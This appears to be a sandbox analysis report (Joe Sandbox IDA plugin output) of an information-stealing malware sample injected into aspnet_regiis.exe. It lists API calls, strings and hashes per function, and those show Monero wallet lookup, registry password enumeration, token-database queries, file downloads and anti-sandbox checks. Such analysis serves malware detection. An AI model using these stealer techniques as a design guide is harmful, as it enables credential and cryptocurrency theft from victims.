Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$CloseHeapLocalOpenmemset$AllocAllocateChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3751012896-218353709
Opcode ID: b450c80b939c1de63bcaf12af0044f92463d59bef07f32f9f37cb5ed18444fae
Instruction ID: 5ab4b0e93713d4183779d6bfa76abc478e31f6a42b1d1cafd0eac57bda609e65
Opcode Fuzzy Hash: b450c80b939c1de63bcaf12af0044f92463d59bef07f32f9f37cb5ed18444fae
Instruction Fuzzy Hash: 985153B1D501199BCB16EB60DC9DFFD733DAF54700F8045A8AA0A62080EF746B88CFA5

Function 02756FA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02756CA0: memset.MSVCRT ref: 02756CE4
Part of subcall function 02756CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,02757660), ref: 02756D0A
Part of subcall function 02756CA0: RegEnumValueA.ADVAPI32(02757660,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02756D81
Part of subcall function 02756CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 02756DDD
Part of subcall function 02756CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02757660,80000001,02763068,?,?,?,?,?,02757660,?), ref: 02756E22
Part of subcall function 02756CA0: HeapFree.KERNEL32(00000000,?,?,?,?,02757660,80000001,02763068,?,?,?,?,?,02757660,?), ref: 02756E29

lstrcat.KERNEL32(2F0D0020,0276DEB8), ref: 02756FD6
lstrcat.KERNEL32(2F0D0020,00000000), ref: 02757018
lstrcat.KERNEL32(2F0D0020, : ), ref: 0275702A
lstrcat.KERNEL32(2F0D0020,00000000), ref: 0275705F
lstrcat.KERNEL32(2F0D0020,0276DEC0), ref: 02757070
lstrcat.KERNEL32(2F0D0020,00000000), ref: 027570A3
lstrcat.KERNEL32(2F0D0020,0276DEC4), ref: 027570BD
task.LIBCPMTD ref: 027570CB

Strings

: , xrefs: 0275701E

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 0912ea068ded4d02e96acea6531279800f4655d746af4d0cd23ad1bb74cf5c5b
Instruction ID: 50a486dc17ffca1ad301e0ecac9a5a3682c36325183bb7394809d3f25bb182ec
Opcode Fuzzy Hash: 0912ea068ded4d02e96acea6531279800f4655d746af4d0cd23ad1bb74cf5c5b
Instruction Fuzzy Hash: 48312071E451059BCB09EBE4DD9CEBFF77AAF44301B504918E906BB280DA74AD19CF90

Function 02756CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02756CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,02757660), ref: 02756D0A
RegEnumValueA.ADVAPI32(02757660,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02756D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 02756DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02757660,80000001,02763068,?,?,?,?,?,02757660,?), ref: 02756E22
HeapFree.KERNEL32(00000000,?,?,?,?,02757660,80000001,02763068,?,?,?,?,?,02757660,?), ref: 02756E29

Part of subcall function 02758C20: vsprintf_s.MSVCRT ref: 02758C3B

task.LIBCPMTD ref: 02756F25

Strings

Password, xrefs: 02756DD1

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 05e60155c5f57deb853abc489c181b10086b930e140a927a59a3fd47f0973cb1
Instruction ID: 621156382237b343366534e6ec2338c7ab695251caf3fc1c55b19d159e1780ef
Opcode Fuzzy Hash: 05e60155c5f57deb853abc489c181b10086b930e140a927a59a3fd47f0973cb1
Instruction Fuzzy Hash: E4612EB5D101689BDB25DB50CC44BEAB7BDBF48300F4085E9EA49A6144DBB09BC9CF91

Function 027641B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 027641CF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0276420C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 02764290
RtlAllocateHeap.NTDLL(00000000), ref: 02764297
wsprintfA.USER32 ref: 027642CD

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Strings

C, xrefs: 027641D9
:, xrefs: 027641E9
\, xrefs: 027641ED

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: fdaad8304aaf44023e660aa1f53eb1961fec82f724cb0967fa497a7816176182
Instruction ID: 472b28c76beb4090d75b67856b2f01b03a83a8fe5b85d616f4331ce2166afea3
Opcode Fuzzy Hash: fdaad8304aaf44023e660aa1f53eb1961fec82f724cb0967fa497a7816176182
Instruction Fuzzy Hash: 3231C4B0D04248AFDF10DFA4DC59BFE77B8AF08704F540498EA496B281D774AA98CF95

Function 02764950 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02BB5F38,00000000,?,0276D774,00000000,?,00000000,00000000,?,02BB5EC0), ref: 0276495D
RtlAllocateHeap.NTDLL(00000000), ref: 02764964
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 02764985
__aulldiv.LIBCMT ref: 0276499F
__aulldiv.LIBCMT ref: 027649AD
wsprintfA.USER32 ref: 027649D9

Strings

@, xrefs: 0276497A
%d MB, xrefs: 027649D0

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: adb68d8820556cb826d84cb0e0ef0bfec51f4c8647cbeeb939ff4d2e742cce83
Instruction ID: 4670768116692edb56a9a1050c4b850271037d7657bf1cf6cece64657dc8b8b2
Opcode Fuzzy Hash: adb68d8820556cb826d84cb0e0ef0bfec51f4c8647cbeeb939ff4d2e742cce83
Instruction Fuzzy Hash: 4211CCB1E44208ABEB10DBE4CC59FBE77B9BB44700F504948FB15BB280D7B5A9148FA4

Function 02755D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Part of subcall function 02754470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 027544F6
Part of subcall function 02754470: InternetCrackUrlA.WININET(00000000,00000000), ref: 02754506

InternetOpenA.WININET(0276D7D3,00000001,00000000,00000000,00000000), ref: 02755DAF
StrCmpCA.SHLWAPI(?,02BB5868), ref: 02755DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 02755E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02755E53
InternetReadFile.WININET(02760E73,?,00000400,?), ref: 02755E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02755EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 02755EE9
InternetCloseHandle.WININET(02760E73), ref: 02755EF3
InternetCloseHandle.WININET(00000000), ref: 02755F00

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: a5e88db2a39e9aee8c8b6743fea4f01f8793705acb21df1d3fe6ec6191589f9a
Instruction ID: 032500e9889e1b8ae8c12efec888c7186fb8e36eaf298288717443734e377ffc
Opcode Fuzzy Hash: a5e88db2a39e9aee8c8b6743fea4f01f8793705acb21df1d3fe6ec6191589f9a
Instruction Fuzzy Hash: DA5167B1940218AFDF20DF50CC99BEEB779BB44705F4044A8EA05BB1C0DBB46A89CF95

Function 02763D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 02763D8E

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

OpenProcess.KERNEL32(001FFFFF,00000000,02763FBD,0276D28B), ref: 02763DCC
memset.MSVCRT ref: 02763E1A
??_V@YAXPAX@Z.MSVCRT ref: 02763F6E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 02763E3C

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: f86cf98aec7d0cafbac58d7ad9f50ddcd799b93a498d44f7007a9c234538af73
Instruction ID: c789312e268aeb865da0e9a313abbf18cdabbe17012ec1e087118c18b1733b17
Opcode Fuzzy Hash: f86cf98aec7d0cafbac58d7ad9f50ddcd799b93a498d44f7007a9c234538af73
Instruction Fuzzy Hash: 715159B0D002189FDB24EB94DC9CBFEB775AF04704F5040E9EA19A7181EB346A88CF64

Function 0275B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 027597F0: memcmp.MSVCRT ref: 0275980B
Part of subcall function 027597F0: memset.MSVCRT ref: 0275983E
Part of subcall function 027597F0: LocalAlloc.KERNEL32(00000040,?), ref: 0275988E

lstrlen.KERNEL32(00000000), ref: 0275B44D

Part of subcall function 02765520: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02765542

StrStrA.SHLWAPI(00000000,AccountId), ref: 0275B47B
lstrlen.KERNEL32(00000000), ref: 0275B553
lstrlen.KERNEL32(00000000), ref: 0275B567

Strings

AccountTokens, xrefs: 0275B28A
AccountId, xrefs: 0275B472
SELECT service, encrypted_token FROM token_service, xrefs: 0275B3BB
AccountTokens, xrefs: 0275B319

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 18989c28e997ba2c10f6c65f3ca3cf67fb85476780eecae0e0afb69988857200
Instruction ID: d25623913b25d8e00734789cbf15edb7ccac90f36a6c162561add71fc37983e8
Opcode Fuzzy Hash: 18989c28e997ba2c10f6c65f3ca3cf67fb85476780eecae0e0afb69988857200
Instruction Fuzzy Hash: 30A130719101189BCF1AEBA1DC6DEFEB33EAF54304F844569E80663094EF746A48CFA0

Function 027636A0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA40D0), ref: 02765F01
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA3F48), ref: 02765F1A
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA3F60), ref: 02765F32
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA3F78), ref: 02765F4A
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA3F90), ref: 02765F63
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA3FA8), ref: 02765F7B
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA3FB8), ref: 02765F93
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA4348), ref: 02765FAC
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA4368), ref: 02765FC4
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA4380), ref: 02765FDC
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA4398), ref: 02765FF5
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA04B0), ref: 0276600D
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA04C8), ref: 02766025
Part of subcall function 02765EC0: GetProcAddress.KERNEL32(74DD0000,02BA7308), ref: 0276603E

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02751190: CreateDCA.GDI32(02BA0598,00000000,00000000,00000000), ref: 027511A2
Part of subcall function 02751190: GetDeviceCaps.GDI32(?,0000000A), ref: 027511B1
Part of subcall function 02751190: ReleaseDC.USER32(00000000,?), ref: 027511C0
Part of subcall function 02751190: ExitProcess.KERNEL32 ref: 027511D1

Part of subcall function 02751120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,027636C7,0276D6E3), ref: 0275112A
Part of subcall function 02751120: ExitProcess.KERNEL32 ref: 0275113E

Part of subcall function 027510D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,027636CC), ref: 027510EB
Part of subcall function 027510D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,027636CC), ref: 027510F2
Part of subcall function 027510D0: ExitProcess.KERNEL32 ref: 02751103

Part of subcall function 027511E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 027511FE
Part of subcall function 027511E0: __aulldiv.LIBCMT ref: 02751218
Part of subcall function 027511E0: __aulldiv.LIBCMT ref: 02751226
Part of subcall function 027511E0: ExitProcess.KERNEL32 ref: 02751254

Part of subcall function 02763430: GetUserDefaultLangID.KERNEL32(?,?,027636D6,0276D6E3), ref: 02763434

GetUserDefaultLangID.KERNEL32 ref: 027636D6

Part of subcall function 02751150: ExitProcess.KERNEL32 ref: 02751186

Part of subcall function 027643B0: GetProcessHeap.KERNEL32(00000000,00000104,02751177,02BA0588,027636DB,0276D6E3), ref: 027643BD
Part of subcall function 027643B0: RtlAllocateHeap.NTDLL(00000000), ref: 027643C4
Part of subcall function 027643B0: GetUserNameA.ADVAPI32(?,00000104), ref: 027643DC

Part of subcall function 027643F0: GetProcessHeap.KERNEL32(00000000,00000104,027636DB,0276D6E3), ref: 027643FD
Part of subcall function 027643F0: RtlAllocateHeap.NTDLL(00000000), ref: 02764404
Part of subcall function 027643F0: GetComputerNameA.KERNEL32(?,00000104), ref: 0276441C

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02BA0578,?,0276D8AC,?,00000000,?,0276D8B0,?,00000000,0276D6E3), ref: 0276377A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02763798
CloseHandle.KERNEL32(00000000), ref: 027637A9
Sleep.KERNEL32(00001770), ref: 027637B4
CloseHandle.KERNEL32(?,00000000,?,02BA0578,?,0276D8AC,?,00000000,?,0276D8B0,?,00000000,0276D6E3), ref: 027637CA
ExitProcess.KERNEL32 ref: 027637D2

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$Userlstrcpy$AllocateCloseCreateDefaultEventHandleLangName__aulldiv$AllocCapsComputerCurrentDeviceGlobalInfoMemoryNumaOpenReleaseSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 848617570-0
Opcode ID: 08c8d38fb81c9c8254bbcb946ce76fe146ca2305a09b39a1327059c33d6106a9
Instruction ID: c9a8a19e8093fe94d958cc9ef74bacea4c097e036885aaad7b9cbe2145e5babe
Opcode Fuzzy Hash: 08c8d38fb81c9c8254bbcb946ce76fe146ca2305a09b39a1327059c33d6106a9
Instruction Fuzzy Hash: 50312A70E54105ABDB06FBF1EC5CBFEB77AAF04741F844528E91262180DFB4A504CEA1

Function 02754C70 Relevance: 10.6, APIs: 7, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02754C8A
RtlAllocateHeap.NTDLL(00000000), ref: 02754C91
InternetOpenA.WININET(0276D79B,00000000,00000000,00000000,00000000), ref: 02754CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 02754CD1
InternetReadFile.WININET(02762E63,?,00000400,00000000), ref: 02754D01
InternetCloseHandle.WININET(02762E63), ref: 02754D75
InternetCloseHandle.WININET(?), ref: 02754D82

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 69c9e5dc94685e7bb71cd15dfe29dceee054d0faf11b6f1a64c44645e6139de6
Instruction ID: 108e77593f6e6fc1d398fb22eaceb9c56f7cbabe492fb17b8117ee0bcbac6a06
Opcode Fuzzy Hash: 69c9e5dc94685e7bb71cd15dfe29dceee054d0faf11b6f1a64c44645e6139de6
Instruction Fuzzy Hash: D331FBB4E44218ABDB24CF54DD84BEDB7B8BB48304F5085D8BB09A7281D7706AC5CF98

Function 02764B69 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 02764BB3
wsprintfA.USER32 ref: 02764BE6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 02764C08
RegCloseKey.ADVAPI32(00000000), ref: 02764C19
RegCloseKey.ADVAPI32(00000000), ref: 02764C26

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

RegQueryValueExA.KERNEL32(00000000,02BB5E30,00000000,000F003F,?,00000400), ref: 02764C79
lstrlen.KERNEL32(?), ref: 02764C8E
RegQueryValueExA.KERNEL32(00000000,02BB5BC0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0276D4B4), ref: 02764D26
RegCloseKey.KERNEL32(00000000), ref: 02764D95
RegCloseKey.ADVAPI32(00000000), ref: 02764DA7

Strings

%s\%s, xrefs: 02764BDA

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 4299dd0d6a7974e3b72a6272523dba5240688f67f0cf1adcb04c57214a82bda0
Instruction ID: 9f1ebfb6ba5280dcb80e04b659b614bf53c34857f2647b541e65e9b581f1be76
Opcode Fuzzy Hash: 4299dd0d6a7974e3b72a6272523dba5240688f67f0cf1adcb04c57214a82bda0
Instruction Fuzzy Hash: 0D211A759401189BDB64DF54DC58FE973B9BF48700F0089D8AA49A6180DF706A89CFE0

Function 02761D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02761DA5
RegOpenKeyExA.KERNEL32(80000001,02BB5510,00000000,00020119,?), ref: 02761DC4
RegQueryValueExA.ADVAPI32(?,02BB6088,00000000,00000000,00000000,000000FF), ref: 02761DE8
RegCloseKey.ADVAPI32(?), ref: 02761DF2
